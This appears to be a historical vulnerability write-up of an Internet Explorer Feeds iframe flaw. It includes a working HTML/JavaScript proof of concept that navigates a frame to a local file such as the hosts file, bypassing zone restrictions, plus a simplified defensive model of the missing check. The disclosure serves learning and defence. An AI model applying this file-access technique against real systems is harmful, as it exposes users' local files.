The IE Feeds WebBrowser control generates a nested iframe when rendering feed content. The open method of that inner iframe is not properly sandboxed — it can load local files. Calling ifr_Feeds[0].open("local_path", "target_frame") bypasses the zone restrictions that normally prevent web content from accessing the filesystem.
<iframe name="ifr_Feeds" src="feeds.xml" width="300" height="200"></iframe>
<iframe name="ifr_Target" width="500" height="200"></iframe>
<script language="JavaScript">
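function main()
{
    // ifr_Feeds[0] is the inner iframe IE generates inside the feeds frame.
    // Its open() navigates ifr_Target to the path typed in the text box.
    ifr_Feeds[0].open(document.all.filePath.value, "ifr_Target");
}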
</script>
<input type="button" onclick="main();" value="Navigate">
<input type="text" size="50" id="filePath" value="c:\windows\system32\drivers\etc\hosts">
The ifr_Feeds[0] reference points to the inner iframe that IE auto-generates inside the feeds renderer. Using ifr_Feeds itself as the target also works, but this version keeps the feeds frame alive for repeated testing. The bug is distinct from an earlier feeds UXSS (WOOBR #973093), which was correctly patched. Tested on IE7/Vista, IE8/Win7, and IE8/XP.
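The check that the inner frame's open method skipped can be modeled in a few lines. This is an added example, not code from the original post and not IE's actual zone logic; the function names and the sample targets other than the hosts path are assumptions made for illustration.

```javascript
// Simplified model of the zone check (assumption: NOT IE's real URL-zone code).
// classifyTarget and mayNavigate are hypothetical names for this sketch.

// "local" = resolves to the filesystem or a UNC share; "remote" = anything else.
function classifyTarget(target) {
  const t = String(target).trim();
  if (/^[a-z]:[\\/]/i.test(t)) return "local";      // drive path: c:\... or c:/...
  if (/^\\\\[^\\]/.test(t)) return "local";          // UNC path: \\server\share
  const scheme = /^([a-z][a-z0-9+.-]*):/i.exec(t);   // explicit URL scheme, if any
  if (scheme && scheme[1].toLowerCase() === "file") return "local";
  return "remote";                                   // http(s), relative URLs, etc.
}

// Internet-zone callers must not navigate any frame to a local target.
function mayNavigate(callerZone, target) {
  return !(callerZone === "internet" && classifyTarget(target) === "local");
}

// Constructed sample targets; the first is the path used in the post.
const samples = [
  "c:\\windows\\system32\\drivers\\etc\\hosts",
  "FILE:///C:/example.txt",
  "\\\\fileserver\\share\\example.txt",
  "feeds.xml",
  "https://example.com/c:/not-a-drive",
];

function blockedFor(callerZone) {
  return samples.filter((s) => !mayNavigate(callerZone, s));
}

console.log(blockedFor("internet")); // the three local targets
console.log(blockedFor("local"));    // nothing blocked for local-zone callers
```

The point of the model is that the decision depends on the caller's zone and the resolved target, so it has to run on every navigation entry point, including ones on auto-generated frames.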
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.